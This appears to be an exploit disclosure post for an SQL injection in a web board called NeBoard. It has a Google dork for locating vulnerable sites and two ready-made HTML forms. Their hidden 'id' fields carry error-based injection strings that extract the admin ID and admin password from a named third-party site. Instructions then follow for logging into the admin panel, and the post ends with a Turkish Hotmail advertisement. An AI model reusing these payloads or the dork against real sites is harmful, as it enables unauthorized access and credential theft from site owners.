|
# Discovered by : Alemin_Krali
# NeBoard Sql Injection Vulnerability [Post Sql]
# Dork :inurl:show.asp?id= ref= step= level= page=
# 2 html form
1.Form:It takes it:ID NAME
2.Form:Admin Password
and later HTTP://SITE.COM/admin/board_edit.asp?id=IDNAME we are entering and 2.form Admin
Password ile Login we are becoming
#Ex:http://eng.habitat.or.kr/Hboard/admin/board_edit.asp?id=free_old
login password:test and you admin:)
<body onload="document.LoginForm.Password.focus();">
<form name="LoginForm"
action="http://www.globalcircuit.co.kr/board//admin//login_confirm.asp"
method="post">
<input type="submit" value="Go ID Name">
<input type="hidden" name="url"
value="http://www.globalcircuit.co.kr/board//admin//login_form.asp">
<input type="hidden" name="query" value="">
<input type="hidden" name="id" value="'and 1=convert(int,(select top 1 ID from
BoardManager))--">
<body onload="document.LoginForm.Password.focus();">
<form name="LoginForm"
action="http://www.globalcircuit.co.kr/board//admin/login_confirm.asp" method="post">
<input type="submit" value="Go ID table Admin Password">
<input type="hidden" name="url"
value="http://www.globalcircuit.co.kr/board//admin/login_form.asp">
<input type="hidden" name="query" value="">
<input type="hidden" name="id" value="'and 1=convert(int,(select top 1 AdminPW from
BoardManager))--">
_________________________________________________________________
Gelen kutunuzda hiç yer kalmamasından bıktınız mı? Windows Live Hotmail şimdi size 5GB
ÜCRETSİZ depolama alanı sunuyor! Ücretsiz Windows Live Hotmail hesabınızı buradan alın!
http://get.live.com/mail/overview
|
